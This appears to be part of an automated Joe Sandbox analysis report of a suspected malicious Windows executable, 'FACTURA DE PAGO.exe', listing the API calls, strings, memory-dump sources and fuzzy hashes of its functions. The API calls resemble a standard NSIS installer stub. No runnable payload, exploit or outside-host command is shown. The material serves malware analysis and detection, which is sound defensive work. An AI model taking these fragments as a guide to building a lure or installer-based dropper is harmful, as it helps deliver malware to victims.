                                                                                        • Instruction Fuzzy Hash: F0419B71804249AFCB058FA5CD459AFBBB9FF44310F00812AF961AA1A0C738EA51DFA5
                                                                                        APIs
                                                                                        • lstrcpyA.KERNEL32(0042B5F8,NUL,?,00000000,?,00000000,00405C0B,?,?), ref: 00405A87
                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,00405C0B,?,?), ref: 00405AAB
                                                                                        • GetShortPathNameA.KERNEL32(?,0042B5F8,00000400), ref: 00405AB4
                                                                                          • Part of subcall function 00405907: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
                                                                                          • Part of subcall function 00405907: lstrlenA.KERNEL32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405949
                                                                                        • GetShortPathNameA.KERNEL32(0042B9F8,0042B9F8,00000400), ref: 00405AD1
                                                                                        • wsprintfA.USER32 ref: 00405AEF
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,0042B9F8,C0000000,00000004,0042B9F8,?,?,?,?,?), ref: 00405B2A
                                                                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405B39
                                                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B71
                                                                                        • SetFilePointer.KERNEL32(004093B0,00000000,00000000,00000000,00000000,0042B1F8,00000000,-0000000A,004093B0,00000000,[Rename],00000000,00000000,00000000), ref: 00405BC7
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00405BD8
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405BDF
                                                                                          • Part of subcall function 004059A2: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\FACTURA DE PAGO.exe,80000000,00000003), ref: 004059A6
                                                                                          • Part of subcall function 004059A2: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                        • String ID: %s=%s$NUL$[Rename]
                                                                                        • API String ID: 222337774-4148678300
                                                                                        • Opcode ID: 1f98854de7e5c40725f23c70871346fb007f1980b568e50079ef848d7602898f
                                                                                        • Instruction ID: 8a014ae25a2f57f4e7f496887e8afb480c0f68f452f449b39f33bde68a4ee9be
                                                                                        • Opcode Fuzzy Hash: 1f98854de7e5c40725f23c70871346fb007f1980b568e50079ef848d7602898f
                                                                                        • Instruction Fuzzy Hash: 5231F370604B19ABC2206B615D49F6B3A6CDF45758F14053AFE01F62D2DA7CB800CEAD
                                                                                        APIs
                                                                                        • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\FACTURA DE PAGO.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405FF2
                                                                                        • CharNextA.USER32(?,?,?,00000000), ref: 00405FFF
                                                                                        • CharNextA.USER32(?,"C:\Users\user\Desktop\FACTURA DE PAGO.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406004
                                                                                        • CharPrevA.USER32(?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406014
                                                                                        Strings
                                                                                        • *?|<>/":, xrefs: 00405FE2
                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F9B
                                                                                        • "C:\Users\user\Desktop\FACTURA DE PAGO.exe", xrefs: 00405FD6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: Char$Next$Prev
                                                                                        • String ID: "C:\Users\user\Desktop\FACTURA DE PAGO.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                        • API String ID: 589700163-2987556050
                                                                                        • Opcode ID: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                                                                        • Instruction ID: 57e0f34d942670e43035b7c22e392f1a12bb14715b301cf1348a0c798ab9ef07
                                                                                        • Opcode Fuzzy Hash: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                                                                        • Instruction Fuzzy Hash: 8B112751809B932AFB3256244C00B7BBFD88F57760F19007BE8D5722C2D67C5D529B6D
                                                                                        APIs
                                                                                        • GetWindowLongA.USER32(?,000000EB), ref: 00403F98
                                                                                        • GetSysColor.USER32(00000000), ref: 00403FB4
                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00403FC0
                                                                                        • SetBkMode.GDI32(?,?), ref: 00403FCC
                                                                                        • GetSysColor.USER32(?), ref: 00403FDF
                                                                                        • SetBkColor.GDI32(?,?), ref: 00403FEF
                                                                                        • DeleteObject.GDI32(?), ref: 00404009
                                                                                        • CreateBrushIndirect.GDI32(?), ref: 00404013
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2320649405-0
                                                                                        • Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                                                        • Instruction ID: f3431a0ddd372d44177634c3e6640760e16b4c563197d04d055afd4279a4596b
                                                                                        • Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                                                        • Instruction Fuzzy Hash: F4219F71808705ABCB209F78DD48A4BBBF8AF41704B048A2AE996F26E0C734E904CB55
                                                                                        APIs
                                                                                        • lstrlenA.KERNEL32(00429048,00000000,0041C205,74DF23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                                                        • lstrlenA.KERNEL32(00402FFA,00429048,00000000,0041C205,74DF23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                                                        • lstrcatA.KERNEL32(00429048,00402FFA,00402FFA,00429048,00000000,0041C205,74DF23A0), ref: 00404FA4
                                                                                        • SetWindowTextA.USER32(00429048,00429048), ref: 00404FB6
                                                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                                                        • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                                                        • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                        • String ID:
                                                                                        • API String ID: 2531174081-0
                                                                                        • Opcode ID: 534154c7e412c88fb75b9fbb21228ed2bc61e9f55108b0b726938b2d4222e579
                                                                                        • Instruction ID: 5247e829223e414f07dbea0a4ec6ac131d28d962b221907bbf4360a320382309
                                                                                        • Opcode Fuzzy Hash: 534154c7e412c88fb75b9fbb21228ed2bc61e9f55108b0b726938b2d4222e579
                                                                                        • Instruction Fuzzy Hash: 76218C71D00118BBDF219FA5DC84ADEBFA9EF08354F10807AF904B6291C7798E408FA8
                                                                                        APIs
                                                                                        • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040482E
                                                                                        • GetMessagePos.USER32 ref: 00404836
                                                                                        • ScreenToClient.USER32(?,?), ref: 00404850
                                                                                        • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404862
                                                                                        • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404888
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$Send$ClientScreen
                                                                                        • String ID: f
                                                                                        • API String ID: 41195575-1993550816
                                                                                        • Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                                                        • Instruction ID: 72a6dff9965abeea3fde93c43f55bc8d1d0b984f63b53e8c81f3052648e7bb03
                                                                                        • Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                                                        • Instruction Fuzzy Hash: EC019275D00218BADB00DBA5DC41FFEBBBCAF45711F10412BBB10B61C0C7B4A5018BA5
                                                                                        APIs
                                                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B9A
                                                                                        • MulDiv.KERNEL32(000D6EBB,00000064,000D6EBF), ref: 00402BC5
                                                                                        • wsprintfA.USER32 ref: 00402BD5
                                                                                        • SetWindowTextA.USER32(?,?), ref: 00402BE5
                                                                                        • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BF7
                                                                                        Strings
                                                                                        • verifying installer: %d%%, xrefs: 00402BCF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                                                        • String ID: verifying installer: %d%%
                                                                                        • API String ID: 1451636040-82062127
                                                                                        • Opcode ID: f377c182e300eefdb83bb0ba9c57991093f425550345df3c4c3600326924e25d
                                                                                        • Instruction ID: f77185bba9c57e6aa61c0c8aee9f592e237af7c43fbef78eddb3d4185353df7a
                                                                                        • Opcode Fuzzy Hash: f377c182e300eefdb83bb0ba9c57991093f425550345df3c4c3600326924e25d
                                                                                        • Instruction Fuzzy Hash: D001F471640208BBEF209F60DD09EAE3779EB04744F008039FA16B51D1D7B5A955DB59
                                                                                        APIs
                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040271A
                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402736
                                                                                        • GlobalFree.KERNEL32(?), ref: 0040276F
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00402782
                                                                                        • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040279A
                                                                                        • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027AE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                        • String ID:
                                                                                        • API String ID: 2667972263-0
                                                                                        • Opcode ID: 77e67ac391457e8d004afc0bb320801bb8c14dfd16ab1e53836186cbf3f5f692
                                                                                        • Instruction ID: 5d6717e5ef000630179c441ec4dabf90fe6e4dbd5b0bc7dedcefa97c90ee8361
                                                                                        • Opcode Fuzzy Hash: 77e67ac391457e8d004afc0bb320801bb8c14dfd16ab1e53836186cbf3f5f692
                                                                                        • Instruction Fuzzy Hash: 1D215E71800124BBCF216FA5CE49EAE7E79EF09324F14423AF910762D1D7795D418FA9
                                                                                        APIs
                                                                                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A9B
                                                                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AD7
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00402AE0
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00402B05
                                                                                        • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B23
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$DeleteEnumOpen
                                                                                        • String ID:
                                                                                        • API String ID: 1912718029-0
                                                                                        • Opcode ID: 7766ad722bcf743109a83c91df0766a7f4c549130a1e07b93abaa864288c9da4
                                                                                        • Instruction ID: e0b40e6d550d0c6dedecb0be42375ee7245bd63e637183e656586a56a8cfacd8
                                                                                        • Opcode Fuzzy Hash: 7766ad722bcf743109a83c91df0766a7f4c549130a1e07b93abaa864288c9da4
                                                                                        • Instruction Fuzzy Hash: 66116D31A00108FEDF22AF90DE89EAA3B7DEB54349B104436FA01B10E0D774AE51DB69
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?), ref: 00401CE2
                                                                                        • GetClientRect.USER32(00000000,?), ref: 00401CEF
                                                                                        • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D10
                                                                                        • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
                                                                                        • DeleteObject.GDI32(00000000), ref: 00401D2D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                        • String ID:
                                                                                        • API String ID: 1849352358-0
                                                                                        • Opcode ID: df9cc67d31b04cd6e9f5647a99bb7b911e6a77bbf16d980a5e8a288dfb7b3bdc
                                                                                        • Instruction ID: 718a49c372d49eeeb619100b459207f1cde729867d9d835a9e14b5832590348d
                                                                                        • Opcode Fuzzy Hash: df9cc67d31b04cd6e9f5647a99bb7b911e6a77bbf16d980a5e8a288dfb7b3bdc
                                                                                        • Instruction Fuzzy Hash: 74F0E7B2A04114AFEB01EBE4DE88DAFB7BDEB54305B10447AF602F6191C7749D018B79
                                                                                        APIs
                                                                                        • GetDC.USER32(?), ref: 00401D3B
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D48
                                                                                        • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D57
                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00401D68
                                                                                        • CreateFontIndirectA.GDI32(0040A818), ref: 00401DB3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd
                                                                                        Similarity
                                                                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                        • String ID:
                                                                                        • API String ID: 3808545654-0
                                                                                        • Opcode ID: c2a9d05608db3b551cbe7321e8fd88224b197bc40f94a71f0fff53b7c1922a27
                                                                                        • Instruction ID: ad7d238852a8d87b5aaa3e6a204337ae93e1cce4a0b470fbec170e72a625d374
                                                                                        • Opcode Fuzzy Hash: c2a9d05608db3b551cbe7321e8fd88224b197bc40f94a71f0fff53b7c1922a27
                                                                                        • Instruction Fuzzy Hash: EA01D632944340AFEB0177B0AE4EBAA3FB49759309F108479F201B62E2C6790052CF6F
                                                                                        APIs
                                                                                        • lstrlenA.KERNEL32(00429868,00429868,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404624,000000DF,00000000,00000400,?), ref: 004047A7
                                                                                        • wsprintfA.USER32 ref: 004047AF
                                                                                        • SetDlgItemTextA.USER32(?,00429868), ref: 004047C2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
